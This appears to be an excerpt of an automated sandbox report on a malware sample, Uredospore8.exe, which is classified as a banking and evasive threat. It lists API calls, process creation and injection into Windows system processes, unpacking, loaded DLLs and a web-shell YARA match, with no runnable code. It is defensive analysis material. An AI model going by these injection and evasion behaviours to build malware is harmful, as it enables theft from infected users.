Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C16C0 NtResumeThread,	30_2_001C16C0
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C15E4 NtCreateUserProcess,	30_2_001C15E4
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02141636 NtCreateProcessEx,	30_2_02141636
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02141677 NtCreateThread,	30_2_02141677
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_021420BC NtEnumerateValueKey,	30_2_021420BC
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_021416C0 NtResumeThread,	30_2_021416C0
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_0214212E NtQueryDirectoryFile,	30_2_0214212E
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_021415E4 NtCreateUserProcess,	30_2_021415E4
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02150655 NtWriteVirtualMemory,	30_2_02150655
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_021505BC ReadProcessMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,	30_2_021505BC

Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_00401200	0_2_00401200
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004030C1	0_2_004030C1
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004030CD	0_2_004030CD
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004039A5	0_2_004039A5
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D0005	2_2_006D0005
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D0EEA	2_2_006D0EEA
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D188F	2_2_006D188F
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D40EC6	3_2_00D40EC6
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D4186B	3_2_00D4186B
Source: C:\Windows\explorer.exe	Code function: 4_2_00F80EC6	4_2_00F80EC6
Source: C:\Windows\explorer.exe	Code function: 4_2_00F8186B	4_2_00F8186B
Source: C:\Windows\explorer.exe	Code function: 4_2_02DF0EC6	4_2_02DF0EC6
Source: C:\Windows\explorer.exe	Code function: 4_2_02DF186B	4_2_02DF186B
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D00EC6	5_2_00D00EC6
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D0186B	5_2_00D0186B
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00F00EC6	6_2_00F00EC6
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00F0186B	6_2_00F0186B
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_0019186B	7_2_0019186B
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00190EC6	7_2_00190EC6
Source: C:\Windows\System32\ctfmon.exe	Code function: 8_2_009E0EC6	8_2_009E0EC6
Source: C:\Windows\System32\ctfmon.exe	Code function: 8_2_009E186B	8_2_009E186B
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_00840EC6	9_2_00840EC6
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_0084186B	9_2_0084186B
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: 10_2_00EE0EC6	10_2_00EE0EC6
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: 10_2_00EE186B	10_2_00EE186B
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 11_2_00A40EC6	11_2_00A40EC6
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 11_2_00A4186B	11_2_00A4186B
Source: C:\Windows\System32\dllhost.exe	Code function: 15_2_005F186B	15_2_005F186B
Source: C:\Windows\System32\dllhost.exe	Code function: 15_2_005F0EC6	15_2_005F0EC6
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 16_2_0053186B	16_2_0053186B
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 16_2_00530EC6	16_2_00530EC6
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_00820EC6	17_2_00820EC6
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 17_2_0082186B	17_2_0082186B
Source: C:\Windows\System32\smartscreen.exe	Code function: 18_2_0025186B	18_2_0025186B
Source: C:\Windows\System32\smartscreen.exe	Code function: 18_2_00250EC6	18_2_00250EC6
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C186B	19_2_001C186B
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C0EC6	19_2_001C0EC6
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 20_2_00930EC6	20_2_00930EC6
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: 20_2_0093186B	20_2_0093186B
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 22_2_0018186B	22_2_0018186B
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 22_2_00180EC6	22_2_00180EC6
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_0067186B	23_2_0067186B
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00670EC6	23_2_00670EC6
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Code function: 24_2_009C0EC6	24_2_009C0EC6
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Code function: 24_2_009C186B	24_2_009C186B
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00F70EC6	25_2_00F70EC6
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00F7186B	25_2_00F7186B
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 27_2_00D50EC6	27_2_00D50EC6
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 27_2_00D5186B	27_2_00D5186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 29_2_011A186B	29_2_011A186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 29_2_011A0EC6	29_2_011A0EC6
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C186B	30_2_001C186B
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C0EC6	30_2_001C0EC6
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_0214186B	30_2_0214186B
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02140EC6	30_2_02140EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 31_2_0234186B	31_2_0234186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 31_2_02340EC6	31_2_02340EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 32_2_00D60EC6	32_2_00D60EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 32_2_00D6186B	32_2_00D6186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 33_2_00E10EC6	33_2_00E10EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 33_2_00E1186B	33_2_00E1186B
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_001D186B	34_2_001D186B
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_001D0EC6	34_2_001D0EC6
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_008B0005	34_2_008B0005
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_008B0EEA	34_2_008B0EEA
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 35_2_0214186B	35_2_0214186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 35_2_02140EC6	35_2_02140EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 36_2_0073186B	36_2_0073186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 36_2_00730EC6	36_2_00730EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 37_2_00B10EC6	37_2_00B10EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 37_2_00B1186B	37_2_00B1186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 38_2_0268186B	38_2_0268186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 38_2_02680EC6	38_2_02680EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 39_2_0255186B	39_2_0255186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 39_2_02550EC6	39_2_02550EC6
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 40_2_0213186B	40_2_0213186B
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: 40_2_02130EC6	40_2_02130EC6

Source: C:\Windows\System32\conhost.exe	Code function: String function: 00F7375B appears 34 times
Source: C:\Windows\SysWOW64\winver.exe	Code function: String function: 00D4375B appears 34 times
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: String function: 001C375B appears 68 times
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: String function: 001D375B appears 34 times
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: String function: 001C38A7 appears 40 times
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: String function: 008B377F appears 34 times
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: String function: 0214375B appears 34 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 0019375B appears 34 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 00F0375B appears 34 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 0084375B appears 34 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 0067375B appears 34 times
Source: C:\Windows\System32\ctfmon.exe	Code function: String function: 009E375B appears 34 times
Source: C:\Windows\explorer.exe	Code function: String function: 00F8375B appears 34 times
Source: C:\Windows\explorer.exe	Code function: String function: 02DF375B appears 34 times
Source: C:\Windows\System32\ApplicationFrameHost.exe	Code function: String function: 0093375B appears 34 times
Source: C:\Windows\System32\smartscreen.exe	Code function: String function: 0025375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 0213375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 00B1375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 011A375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 0073375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 0268375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 0214375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 0234375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 00E1375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 0255375B appears 34 times
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Code function: String function: 00D6375B appears 34 times
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: String function: 00EE375B appears 34 times
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: String function: 006D377F appears 34 times
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: String function: 0053375B appears 34 times
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: String function: 00D5375B appears 34 times
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: String function: 0018375B appears 34 times
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: String function: 0082375B appears 34 times
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: String function: 00A4375B appears 34 times
Source: C:\Windows\System32\sihost.exe	Code function: String function: 00D0375B appears 34 times
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Code function: String function: 009C375B appears 34 times
Source: C:\Windows\System32\dllhost.exe	Code function: String function: 005F375B appears 34 times

Source: Uredospore8.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR

Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56

Source: classification engine

Classification label: mal100.bank.evad.winEXE@13/15@2/2

Source: C:\Users\user\Desktop\Uredospore8.exe

Code function: 2_2_006D0005 ExitProcess,GetProcAddress,GetModuleHandleW,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA,CreateMutexA,lstrcat,lstrcmpiA,Sleep,CreateDirectoryA,SetFileAttributesA,CreateDirectoryA,SetFileAttributesA,CreateDirectoryA,SetFileAttributesA,VirtualAlloc,VirtualFree,Sleep,

2_2_006D0005

Source: C:\Windows\SysWOW64\winver.exe

File created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\E6B93DA9

Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe	Mutant created: \Sessions\1\BaseNamedObjects\E6B93DA9
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Mutant created: NULL

Source: Uredospore8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Uredospore8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Uredospore8.exe

ReversingLabs: Detection: 86%

Source: unknown	Process created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"
Source: C:\Users\user\Desktop\Uredospore8.exe	Process created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"
Source: C:\Users\user\Desktop\Uredospore8.exe	Process created: C:\Windows\SysWOW64\winver.exe winver
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
Source: C:\Users\user\Desktop\Uredospore8.exe	Process created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Process created: C:\Windows\SysWOW64\winver.exe winver	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Uredospore8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\RuntimeBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Section loaded: nss3.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Uredospore8.exe	Unpacked PE file: 2.2.Uredospore8.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .flat:ER;
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Unpacked PE file: 34.2.bin.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .flat:ER;

Source: bin.exe.3.dr	Static PE information: real checksum: 0x200e6 should be: 0x1b198
Source: Uredospore8.exe	Static PE information: real checksum: 0x200e6 should be: 0x18bbe

Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_0040405C push AE79C959h; retf	0_2_00404068
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_00407422 push es; iretd	0_2_00407437
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004016E2 push AE79C959h; retf	0_2_004016EE
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_00403F5C push AE79C959h; retf	0_2_00403F68
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_00405FD0 push ss; iretd	0_2_00405FD1
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004015E2 push AE79C959h; retf	0_2_004015EE
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004039A5 push AE79C959h; retf	0_2_004040EF
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_0070243E push AE79C959h; retf	0_2_0070244A
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_0070233E push AE79C959h; retf	0_2_0070234A
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D0C5B push edi; ret	2_2_006D0C97
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D0BCA push edi; ret	2_2_006D0C97
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D40BA6 push edi; ret	3_2_00D40C73
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D40C37 push edi; ret	3_2_00D40C73
